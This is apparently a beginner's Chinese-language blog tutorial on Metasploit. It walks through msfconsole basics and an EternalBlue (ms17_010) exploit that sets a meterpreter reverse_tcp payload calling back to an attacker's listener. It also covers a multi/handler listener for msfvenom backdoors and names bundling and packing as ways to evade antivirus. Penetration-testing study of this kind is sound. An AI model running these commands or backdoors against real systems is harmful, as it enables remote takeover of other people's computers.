【网络安全】-入门版

secure

  • 一、基本工具
    • [1、metasploit framework](#1、metasploit framework)

      ps.本着兴趣爱好,加强电脑的安全防护能力,并严格遵守法律和道德规范。

一、基本工具

1、metasploit framework

msf(metasploit framework)是一个开源的渗透测试框架 ,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具漏洞利用模块负载模块,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括Windows、Linux和Mac OS X。

msf使用法则:使用模块->配置模块必选项->运行模块

bash 复制代码
msfconsole		//进入msf控制台,以使用模块(推荐root权限)
>>>进入msf

//1、使用模块
search 关键词	//搜索模块
use 模块编号/绝对路径	//使用模块
>>>进入模块
//2、配置模块必选项
show options	//显示配置选项
set 选项名称 值
//3、运行模块
run

举例:metasploit攻击永恒之蓝 (后门)

1、有此漏洞的目标主机

bash 复制代码
//1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
//2、设置必选项
//查看必选项[*required为yes的就是必选项]
show options
set RH0TS 192.168.1.128	//[RHOSTS:为target host(s)代表你要攻击谁]
set payload windows/x64/meterpreter/reverse_tcp	//[payload,是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter相当于内部策反的间谍,提供远程控制功能。]
set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁,既Kali的IP地址]
set LPORT 12345	//[LPORT:为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用]
3、运行
run
4、进入目标主机
>>>meterpreter
help	//从帮助里看看能对目标主机干什么

2、无此漏洞的目标主机(常用)

没有漏洞就得拍个间谍过去,把后门打开。

2.1 目标主机的间谍软件:msfvenom是用来生成后门的软件,在目标机上执行后门 ,在本地监听上线,更容易策反meterpreter ,图中是windows,此外,还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用,不是msfconsoles终端]

避开杀毒软件

方法一:和正常软件捆绑

方法二:给辅助软件加壳

自行寻找

2.2 本地主机的接应程序:

bash 复制代码
use exploit/multi/handler	//攻击多目标载荷模块
set payload windows/x64/meterpreter/reverse_tcp//设置载荷
set thost 192.168.1.136
set lport 9999
run
相关推荐
独行soc2 分钟前
2026年渗透测试面试题总结-20(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
翼龙云_cloud11 分钟前
阿里云渠道商:阿里云 ECS 从安全组到云防火墙的实战防护指南
安全·阿里云·云计算
程序猿阿伟39 分钟前
《TypeScript中Protobuf到运行时类型安全的转换指南》
javascript·安全·typescript
小白电脑技术43 分钟前
飞牛漏洞焦虑?别瞎折腾WAF了!用Lucky五步搞定“防爬墙”
服务器·网络·安全
一战成名99644 分钟前
深度解析 CANN 模型转换工具链:从 ONNX 到 OM
人工智能·学习·安全·开源
轻造科技44 分钟前
工艺变更管理系统+版本控制:旧工艺自动作废,避免新旧版本混用
安全·mes系统·轻造科技
risc1234561 小时前
复杂网络理论
安全
乾元1 小时前
身份与访问:行为生物识别(按键习惯、移动轨迹)的 AI 建模
运维·网络·人工智能·深度学习·安全·自动化·安全架构
九.九1 小时前
CANN 算子生态的底层安全与驱动依赖:固件校验与算子安全边界的强化
大数据·数据库·安全
devmoon1 小时前
在 Polkadot 链上添加智能合约功能全指南
安全·区块链·智能合约·polkadot·erc-20·测试网·独立链